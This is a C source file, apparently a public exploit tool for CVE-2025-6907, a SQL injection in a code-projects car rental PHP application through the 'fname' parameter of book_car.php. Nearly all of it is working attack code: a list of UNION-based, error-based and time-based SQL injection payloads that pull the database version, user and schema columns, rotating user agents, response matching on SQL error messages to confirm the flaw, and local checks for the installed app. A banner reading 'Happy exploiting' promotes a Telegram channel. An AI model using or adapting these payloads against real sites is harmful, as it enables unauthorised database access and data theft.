//CVE : cve-2025-6907 //File Name : exploit.c //Author : Byte Reaper //Target Service : CODE_PROJECT //Type : Sql Injection //--------------------------------------------------------------------------------------------------- #include #include #include #include #include "argparse.h" #include #include #include #include #define FULL_URL 4500 #define USE_URL 4096 #define BUF_CHECK_FOLDER 1096 int showResponse = 0; int useFullurl = 0; int apacheRunning = 0; int verbose = 0; const char *inputUrl = NULL; void checkSystem() { #ifdef _WIN32 printf("\e[1;31m[-] Error Run Exploit !\n"); printf("\e[1;31m[-] Your Os : Windows 32 bit / 64 bit !\n"); printf("\e[1;31m[-] Please Change Your System on Linux !\n"); exit(1); #elif TARGET_OS_MAC printf("\e[1;31m[-] Error Run Exploit !\n"); printf("\e[1;31m[-] Your Os : MacOS !\n"); printf("\e[1;31m[-] Please Change Your System on Linux !\n"); exit(1); #elif __linux__ printf("\e[1;36m[+] Exploit started successfully...\n"); printf("\e[1;36m[+] Your Os : Linux !\n"); #else printf("\e[1;31m[-] Error Run Exploit !\n"); printf("\e[1;31m[-] Your Os : Unknow Os !\n"); printf("\e[1;31m[-] Please Change Your System on Linux !\n"); exit(1); #endif } struct Mem { char *buffer; size_t len; }; size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) { size_t total = size * nmemb; struct Mem *m = (struct Mem *)userdata; char *tmp = realloc(m->buffer, m->len + total + 1); if (!tmp) return 0; m->buffer = tmp; memcpy(&(m->buffer[m->len]), ptr, total); m->len += total; m->buffer[m->len] = '\0'; return total; } const char *sql_response_signatures[] = { "syntax error", "Warning: mysql_fetch_assoc()", "Warning: mysqli_query()", "SQLSTATE", "Invalid query", "Unclosed quotation mark", "quoted string not properly terminated", "You have an error in your SQL syntax", "Warning: pg_query()", "Warning: pg_send_query()", "pg_query(): Query failed", "Microsoft OLE DB Provider for SQL Server", "Incorrect syntax near", "Unclosed quotation mark after the character string", "SQL error", "mysql_num_rows() expects parameter", "mysql_fetch_array() expects parameter", "Fatal error", "mysql_fetch_object() expects parameter", "mysqli_fetch_assoc() expects parameter", "mysql_fetch_row() expects parameter", "supplied argument is not a valid MySQL", "Warning: mssql_query()", "syntax error at or near", "org.hibernate.exception", "unexpected end of SQL command", "SQL query failed", "database query error", "DB2 SQL error", "OLE DB provider returned message", "JDBC SQL error", "pg_fetch_array() expects parameter", "pg_fetch_assoc() expects parameter", "Query execution failed", "Database error", "Unhandled Exception", "ORA-00933: SQL command not properly ended", "ORA-01756: quoted string not properly terminated", "SQL Server Error", "mysql_numrows() expects parameter", "mysql_num_fields() expects parameter", "Syntax error or access violation", "SQL syntax error", "NativeError", "ODBC SQL Server Driver", "Warning: odbc_exec()", "Warning: odbc_prepare()", "Fatal error: Call to a member function", }; const char *a[] = { "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4043.US Safari/537.36", "Mozilla/5.0 (Linux; Android 4.4.2; SM-P600 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0", "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.22 Safari/537.36", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE)", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36", "Mozilla/5.0 (X11; CrOS x86_64 6812.88.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.153 Safari/537.36", "Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0" }; void agent(CURL *curl) { static int c = 0; static int nma = sizeof(a) / sizeof(a[0]); const char *us = a[c]; c = (c + 1) % nma; curl_easy_setopt(curl, CURLOPT_USERAGENT, us); } const char *payloadSql[] = { "' OR '1'='1' --+", "' UNION SELECT NULL,NULL,NULL --+", "' UNION SELECT NULL,@@version,NULL --+", "' UNION SELECT NULL,database(),user() --+", "'/**/UNION/**/SELECT/**/NULL,version(),NULL--+", "' OR IF(1=1, SLEEP(5), 0)--+", "' OR IF(ASCII(SUBSTRING((SELECT database()),1,1)) > 64, SLEEP(5), 0)--+", "\" UNION SELECT NULL,@@version,NULL --+", "' AND updatexml(1,concat(0x7e,(SELECT user()),0x7e),1) --+", "' OR IF(1=1, SLEEP(3), 0) --+", "'; SELECT user(); --+", "' UNION SELECT 1,2,0x6461746162617365 --+", "' UNION SELECT table_name,column_name,NULL FROM information_schema.columns WHERE table_schema=database() --+" }; int numberKey = sizeof(sql_response_signatures) / sizeof(sql_response_signatures[0]); void e(const char *baseUrl) { char full[FULL_URL]; CURL *curl = curl_easy_init(); struct Mem chunk = { NULL, 0 }; long ht = 0; if (!curl) { printf("\e[1;31m[-] Error Create Object Curl.\n"); printf("\e[1;31m[-] Please Check Your Connection, (Ex command : ip show)\n"); printf("\e[1;33m[-] Run Command ip show ...\n"); const char *command = "ip show"; const char *argv[] = { NULL, command }; const char *envp[] = { NULL }; __asm__ volatile ( "mov $59, %%rax\n\t" "mov %[command], %%rdi\n\t" "mov %[argv], %%rsi\n\t" "mov %[envp], %%rdx\n\t" "syscall\n\t" "mov $60, %%rax\n\t" "xor %%rdi, %%rdi\n\t" "syscall\n\t" : :[command] "r" (command), [argv] "r" (argv), [envp] "r" (envp) :"rax", "rdi", "rsi", "rdx" ); goto exit; } curl_easy_setopt(curl, CURLOPT_ACCEPT_ENCODING, ""); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(curl, CURLOPT_WRITEDATA, &chunk); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); if (verbose) { curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } int numberPayload = sizeof(payloadSql) / sizeof(payloadSql[0]); for (int p = 0; p < numberPayload; ++p) { const char *payload = payloadSql[p]; size_t lenPayload = strlen(payload) - 1; char *esc = curl_easy_escape(curl, payload, 0); if (!esc) { fprintf(stderr, "\e[1;31m[-] URL-encoding failed for payload\n"); continue; } if (useFullurl) { snprintf(full, sizeof(full), "%s%s", baseUrl, esc); } else { snprintf(full, sizeof(full), "%s/book_car.php?fname=%s", baseUrl, esc); } if (verbose) { printf("\e[1;35m[payload] [%02d] %p-%p %08zx \e[0m\n", p, (void*)payload, (void*)(payload + lenPayload), lenPayload); } curl_free(esc); struct curl_slist *h = NULL; h = curl_slist_append(h, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"); h = curl_slist_append(h, "Accept-Encoding: gzip, deflate, br"); h = curl_slist_append(h, "Accept-Language: en-US,en;q=0.5"); h = curl_slist_append(h, "Connection: keep-alive"); h = curl_slist_append(h, "Referer: http://example.com/"); h = curl_slist_append(h, "Cache-Control: no-cache"); h = curl_slist_append(h, "Pragma: no-cache"); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h); if (chunk.buffer) { free(chunk.buffer); chunk.buffer = NULL; } chunk.len = 0; printf("\e[1;34m[+] Full Format Url : %s", full); curl_easy_setopt(curl, CURLOPT_URL, full); agent(curl); struct timeval start, end; gettimeofday(&start, NULL); CURLcode r = curl_easy_perform(curl); gettimeofday(&end, NULL); long elapsed = (end.tv_sec - start.tv_sec) * 1000 + (end.tv_usec - start.tv_usec) / 1000; curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &ht); if (elapsed > 4000) { printf("\e[1;32m[+] Check Time-Based Blind SQLi on Target...\n"); printf("\e[1;32m[+] Time-Delay Detected (%ld ms)\n"); printf("\e[1;32m[+] Target likely VULNERABLE to Time-Based Blind SQLi!\n", elapsed); break; } if (r != CURLE_OK) { printf("\e[1;33m[!] Please Check Your Connection on Server !\n"); printf("\e[1;33m[!] Exemple Command Check Access Connection : ping google.com\n"); printf("\e[1;34m[*] Run Command For Check Your Connection : ping -c 5 8.8.8.8"); const char *command = "/bin/ping"; char *const argv[] = {"ping", "-c", "2", "8.8.8.8", NULL}; const char *envp[] = {NULL}; __asm__ volatile ( "mov $59, %%rax\n\t" "mov %[command], %%rdi\n\t" "mov %[argv], %%rsi\n\t" "mov %[envp], %%rdx\n\t" "syscall\n\t" "mov $60, %%rax\n\t" "xor %%rdi, %%rdi\n\t" "syscall\n\t" : :[command] "r" (command), [argv] "r" (argv), [envp] "r" (envp) :"rax", "rdi", "rsi", "rdx" ); fprintf(stderr, "\e[1;31m[-] curl error: %s\n", curl_easy_strerror(r)); } else { printf("\e[1;34m\n[+] Request Send Success !\n"); printf("\e[1;32m[+] HTTP CODE : %ld\n", ht); if (ht >= 200 && ht < 300) { printf("\e[1;34m[+] The payload was successfully responded to by the server !\n"); int found = 0; for (int k = 0; k < numberKey; ++k) { if (strstr(chunk.buffer, sql_response_signatures[k])) { printf("\e[1;34m[+] A suspicious word was found: %s\n", sql_response_signatures[k]); printf("\e[1;34m[+] The server is vulnerable to CVE‑2025‑6907 !\n"); found = 1; break; } } if (!found) { printf("\e[1;31m[-] No suspicious patterns found in response for this payload.\n"); if (showResponse) { printf("\e[1;33m-------------------------------- Response Server --------------------------------\n"); printf("%s\n", chunk.buffer); printf("\e[1;33m-----------------------------------------------------------------------------------\n"); } printf("\e[0;36m[*] Trying next payload...\n\n"); printf("\e[1;37m---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n"); } else { if (showResponse) { printf("\e[1;33m-------------------------------- Response Server --------------------------------\n", chunk.buffer); printf("%s", chunk.buffer); printf("\e[1;33m-----------------------------------------------------------------------------------\n"); } goto exit; } } else { printf("\e[1;31m[-] Unexpected HTTP code %ld for this payload, trying next...\n\n", ht); } } curl_slist_free_all(h); h = NULL; } printf("\e[1;31m[-] All payloads tested. No SQLi signature detected.\n"); exit: if (chunk.buffer) { free(chunk.buffer); } if (curl) { curl_easy_cleanup(curl); } } int runS = 0; int checkFilesInFolder(const char *folderPath) { int fd = open(folderPath, O_RDONLY | O_DIRECTORY); if (fd < 0) { perror("[-] Error open folder"); return -1; } char buffer[BUF_CHECK_FOLDER]; int nread = syscall(217, fd, buffer, BUF_CHECK_FOLDER); if (nread <= 0) { printf("\e[1;31m[-] Error reading folder content: %s\n", folderPath); close(fd); return -1; } struct linux_dirent64 { unsigned long long d_ino; long long d_off; unsigned short d_reclen; unsigned char d_type; char d_name[]; }; const char *filesToCheck[] = { "book_car.php", "my-booking.php", "booking.php", "include", "admin", "assets", "car-listing.php", "check_availability.php", "contact-us.php", "index.php", "logout.php", "my-booking.php", "my-testimonials.php", "page.php", "post-testimonial.php", "profile.php", "search-carresult.php", "update-password.php", "vehical-details.php" }; const int numberFiles = sizeof(filesToCheck) / sizeof(filesToCheck[0]); int foundFiles[numberFiles]; memset(foundFiles, 0, sizeof(foundFiles)); int bpos = 0; while (bpos < nread) { struct linux_dirent64 *d = (struct linux_dirent64 *)(buffer + bpos); for (int i = 0; i < numberFiles; i++) { if (strcmp(d->d_name, filesToCheck[i]) == 0) { foundFiles[i] = 1; } } bpos += d->d_reclen; } close(fd); int showAn = 0; printf("\e[1;35m\n[+] Step 2 : Check the files inside the folder...\n"); printf("\e[1;37m-----------------------------------------------------------------------------------------------\n"); for (int i = 0; i < numberFiles; i++) { if (foundFiles[i]) { if (!showAn) { printf("\e[1;34m[+] Analysis File Code-PROJECTS...\n"); showAn = 1; } printf("\e[1;34m[+] Found file code-projects Car : %s/%s\n", folderPath, filesToCheck[i]); if (strcmp(filesToCheck[i], "my-booking.php") == 0|| strcmp(filesToCheck[i], "car-listing.php") == 0|| strcmp(filesToCheck[i], "page.php") == 0) { printf("\e[1;33m-----------------------------------Result Check File-----------------------------------\n"); printf("\e[1;34m[+] File my-booking.php : The file that causes the SQL vulnerability\n"); printf("\e[1;34m[+] File page.php : Service display page\n"); printf("\e[1;34m[+] File car-listing.php : Car information file\n"); printf("\e[1;34m[+] All files that confirm the service are present !!\n"); printf("\e[1;33m----------------------------------------------------------------------------------------\n"); break; } } else { if (verbose) { printf("[-] File not Found : %s\%s\n",folderPath, filesToCheck[i]); } continue; } fflush(stdout); } return 0; } int checkFile() { const char *exp = "\e[1;35m[+] Service search argument is enabled on your system"; char buffer[BUF_CHECK_FOLDER]; const char *step1 = "\e[1;33m[+] An attempt to search within the /var/www/html directory has been initiated...\n"; printf("\e[1;35m[+] Step 1 : Check Folder Service ...\n"); size_t step1Len = strlen(step1) - 1; const char *path = "/var/www/html"; const char *errorMessage = "\e[1;31m[-] Error Check Path /var/www/html !\n"; size_t lenError = strlen(errorMessage); int fd; __asm__ volatile ( "mov $1, %%rax\n\t" "mov $1, %%rdi\n\t" "mov %[step1], %%rsi\n\t" "mov %[step1Len], %%rdx\n\t" "syscall\n\t" "mov $2, %%rax\n\t" "mov %[pth], %%rdi\n\t" "mov $0, %%rsi\n\t" "mov $0, %%rdx\n\t" "syscall\n\t" "cmp $0, %%rax\n\t" "jl 1f\n\t" "mov %%eax, %0\n\t" "jmp 2f\n" "1:\n\t" "mov $1, %%rax\n\t" "mov $1, %%rdi\n\t" "mov %[err_msg], %%rsi\n\t" "mov %[err_len], %%rdx\n\t" "syscall\n\t" "mov $-1, %%eax\n\t" "2:\n\t" : "=r"(fd) : [step1] "r"(step1), [step1Len] "r"(step1Len), [pth] "r"(path), [err_msg] "r"(errorMessage), [err_len] "r"(lenError) : "rax","rdi","rsi","rdx","rcx","r11" ); int32_t nread; __asm__ volatile ( "mov $217, %%rax\n\t" "syscall\n\t" : "=a"(nread) : "D"(fd), "S"(buffer), "d"((unsigned long)BUF_CHECK_FOLDER) : "rcx", "r11" ); if (nread <= 0) { const char *errorContent = "\e[1;31m[-] Error Check Content Folder !\n"; size_t lenCheck = strlen(errorContent); write(1, errorContent, lenCheck); close(fd); return -1; } struct linux_dirent64 { unsigned long long d_ino; long long d_off; unsigned short d_reclen; unsigned char d_type; char d_name[]; }; const char *nameFolder[] = { "care", "online_care", "online_care_rental", "rental_care", "online", "Care_online", "my_care", "car_rental", "rental_system", "car_booking", "book_car", "booking", "car_rentals", "car_rental_system", "rental", "car_service", "rental_service", "car_rental_app", "rental_app", "carrental", "onlinerental", "onlinerentalcar", "rentals", "carhire", "autocare", "carshare", "online_car_rental", "vehicles", "fleet", "fleet_management", "car_fleet", "my_rental", "online_rent", "auto_rent", "car_rental_project", "online_car_rental_service" }; const int numberName = sizeof(nameFolder) / sizeof(nameFolder[0]); int foundName[numberName]; memset(foundName, 0, sizeof(foundName)); int bpos = 0; while (bpos < nread) { struct linux_dirent64 *d = (struct linux_dirent64 *)(buffer + bpos); for (int i = 0; i < numberName; i++) { if (strcmp(d->d_name, nameFolder[i]) == 0) { foundName[i] = 1; } } bpos += d->d_reclen; } close(fd); printf("\e[1;37m\n-----------------------------------------------------------------------------------------------\n"); for (int i = 0; i < numberName; i++) { if (foundName[i]) { printf("\e[1;34m\n[+] Found folder: %s/%s\n", path, nameFolder[i]); fflush(stdout); char subfolderPath[512]; snprintf(subfolderPath, sizeof(subfolderPath), "%s/%s", path, nameFolder[i]); checkFilesInFolder(subfolderPath); } //If you want to see the failed attempts else { if (verbose) { printf("\e[1;31m\n[-] Not found : %s/%s\n", path, nameFolder[i]); fflush(stdout); } } } return 0; } void checkProccess() { FILE *file ; printf("\e[1;35m[+] Step 3 : Check apache Server on System ...\n"); char buffer[1024]; file = popen("ps aux | grep -i apache | grep -v grep", "r"); if (file == NULL) { printf("\e[1;31m[-] Error Open Proccess !\n"); } while (fgets(buffer, sizeof(buffer), file) != NULL) { if (strstr(buffer, "apache2") != NULL || strstr(buffer, "httpd") != NULL) { apacheRunning = 1; break; } } pclose(file); printf("\e[1;34m[+] Try to run Apache...\n"); if (apacheRunning) { printf("\e[1;34m[+] Apache is running !\n"); int check = system("systemctl start apache2.service "); if (check == 0) { printf("\e[1;34m[+] Server Apache Run Success !\n"); } else { printf("\e[1;31m[-] Error Run Command systemctl start apache2.service !\n"); } } else { printf("\e[1;31m[-] Apache is NOT running !\n"); } } void runRoot() { if (geteuid() != 0) { printf("\e[1;31m[-] You need to run this as root !\n"); printf("\e[1;31m[-] Exemple Command : sudo su\n"); printf("\e[1;31m[-] And Run Exploit , Exit...\n"); exit(1); } } void memory(void) { FILE *f = fopen("/proc/self/maps", "r"); if (!f) { perror("[-] fopen(/proc/self/maps)"); return; } printf("\n\e[1;35m========================================[Memory Map]========================================\e[0m\n"); char line[256]; while (fgets(line, sizeof(line), f)) { printf("%s", line); } printf("\e[1;35m=========================================================================================\e[0m\n\n"); fclose(f); } void showHelp() { printf("\e[1;37m\n[+] Explanation of the arguments:\n"); printf("\e[1;37m\n[+] Explanation of the arguments:\n"); printf("\e[1;37m\t1- *-u / --url:\n"); printf("\e[1;37m\t\tAn argument to pass the base URL pointing to a specific file named 'book_car.php' with a query parameter 'fname'.\n"); printf("\e[1;37m\t\tThe tool appends your input directly to this URL, creating requests like: book_car.php?fname=YOUR_INPUT\n"); printf("\e[1;37m\t\tThis is useful for targeted testing when the vulnerable parameter is 'fname' in 'book_car.php'.\n"); printf("\e[1;37m\t\t[+] Example: ./exploit -u http://127.0.0.1\n\n"); printf("\e[1;37m\t2- *-r / --response:\n"); printf("\e[1;37m\t\tShow HTTP response bodies for each request.\n"); printf("\e[1;37m\t\tHelps inspect server feedback and error messages.\n"); printf("\e[1;37m\t\t[+] Example: ./exploit -u http://127.0.0.1 -r\n\n"); printf("\e[1;37m\t3- *-i / --input:\n"); printf("\e[1;37m\t\tTreat the provided URL as a full URI (including query).\n"); printf("\e[1;37m\t\tUseful for custom endpoints or non-standard paths.\n"); printf("\e[1;37m\t\t[+] Example: ./exploit -u \"http://127.0.0.1/file.php?fname=1' OR '1'='1\" -i\n\n"); printf("\e[1;37m\t4- *-c / --check:\n"); printf("\e[1;37m\t\tPerform service & environment checks (files, folders, Apache).\n"); printf("\e[1;37m\t\tVerifies prerequisites before sending payloads.\n"); printf("\e[1;37m\t\t[+] Example: ./exploit -c\n\n"); printf("\e[1;37m\t5- *-v / --verbose:\n"); printf("\e[1;37m\t\tEnable verbose mode (detailed curl operations & payload mapping).\n"); printf("\e[1;37m\t\tPrints additional debug info such as payload addresses and curl logs.\n"); printf("\e[1;37m\t\t[+] Example: ./exploit -u http://127.0.0.1/book_car.php?fname= -v\n\n"); printf("\e[1;37m-----------------------------------------------------------------------------------------------------------------------------------------------------------\n"); } int main(int argc, const char **argv) { printf("\e[1;31m" "⠀⠀⠀⠀⠀⣶⡆⠀⠀⠀⢀⣴⢦⠀⠀⠀⠀⣖⡶⠀⠀⠀⠀⡏⡧⠀⠀⠀⠀⠀\n" "⠀⠀⠀⠀⠀⢹⣷⡀⠀⠀⢀⣿⣧⡀⠀⠀⢠⣾⣧⠀⠀⠀⣠⣾⡇⠀⠀⠀⠀⠀\n" "⠀⠀⠀⠀⠀⢸⣿⣿⣦⡀⣼⣿⣿⣷⡀⢠⣿⣿⣿⡆⢀⣾⣿⣿⡇⠀⠀⠀⠀⠀\n" "⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀\n" "⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⠋⠙⢿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀\n" "⠀⠀⠀⠀⠠⣤⣉⣙⠛⠛⠛⠿⠿⠁⣴⣦⡈⠻⠛⠛⠛⢛⣉⣁⡤⠀⠀⠀⠀⠀\n" "⠀⠀⠀⠀⠀⠈⠉⠛⠻⠿⠶⣶⣆⠈⢿⡿⠃⣠⣶⡿⠿⠟⠛⠉⠀⠀⠀⠀⠀⠀\n" "⠀⠀⠀⠀⠀⢠⣿⣿⣶⣶⣤⣤⣤⣤⡀⢁⣠⣤⣤⣤⣶⣶⣿⣿⡀⠀⠀⠀⠀⠀\n" "⠀⠀⠀⠀⠀⣸⣿⡏⠉⠙⠛⠿⢿⣿⣿⣾⣿⡿⠿⠛⠋⠉⠹⣿⡇⠀⠀⠀⠀⠀\n" "⠀⠀⠀⠀⠀⠻⢿⣧⣀⠀⠀⣀⣀⣼⡿⣿⣯⣀⣀⠀⠀⣀⣼⡿⠗⠀⠀⠀⠀⠀\n" "⠀⠀⠀⠀⠀⠀⠀⠙⠻⣿⣿⣿⣿⣿⠁⠘⣿⣿⣿⣿⣿⠟⠉⠀⠀⠀⠀⠀⠀⠀\n" "⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⣿⣿⣿⣇⣀⣀⣹⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀\n" "⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣿⠿⣿⡿⢿⣿⠿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n" "⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⡇⢀⣿⡇⢸⣿⡀⢸⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n" "⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠈⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n" ); printf("\e[1;31m■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■\n"); printf("■ \e[1;37m BYTE REAPER | CVE-2025-6907 SQLI TOOL \e[1;31m\n"); printf("■ \e[1;32m Target : CODE_PROJECT \e[1;31m\n"); printf("■ \e[1;34m Channel: https://t.me/exploiterX0 \e[1;31m\n"); printf("\e[0;32m■ -> Happy exploiting !!\n"); printf("\e[1;31m■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■\n\n"); printf("\e[1;37m-----------------------------------------------------------------------------------------------------------------------------------------------------------\n"); const char *targetUrl = NULL; int run = 0; int showH = 0; const char *yourUse = NULL; runRoot(); checkSystem(); struct argparse_option options[] = { OPT_BOOLEAN('h', "help", &showH, "Show detailed help"), OPT_STRING('u', "url", &targetUrl, "Enter Target URL"), OPT_BOOLEAN('r', "response", &run, "This Argument For Show Response Server"), OPT_STRING('i', "input", &inputUrl, "Enter FULL URL"), OPT_BOOLEAN('c', "check", &runS, "Argument to check Service CODE_PROJECT and File,Folder,Apache, process..."), OPT_BOOLEAN( 'v', "verbose", &verbose, "Verbose Mode"), OPT_END(), }; struct argparse argparse; argparse_init(&argparse, options, NULL, 0); argparse_parse(&argparse, argc, argv); useFullurl = (inputUrl != NULL); const char *url = inputUrl ? inputUrl : targetUrl; showResponse = run ; if(showH) { showHelp(); } if (runS && !url) { checkFile(); checkProccess(); return 0; } if (!runS && !url) { printf("\e[1;31m\n[-] Please Enter Target URL !\n"); printf("\e[1;33m[!] Exemple : ./exploit -u http://192.168.1.100/book_car.php\n"); __asm__ volatile ( "mov $60, %%rax\n\t" "xor %%rdi, %%rdi\n\t" "syscall\n\t" : : :"rax", "rdi" ); } if (runS && url) { checkFile(); checkProccess(); } if (verbose) { verbose = 1; printf("\e[0;34m[+] Verbose Mode Run...\n"); printf("\e[0;34m[+] Show Memory Location Run...\n"); memory(); } e(url); return 0; }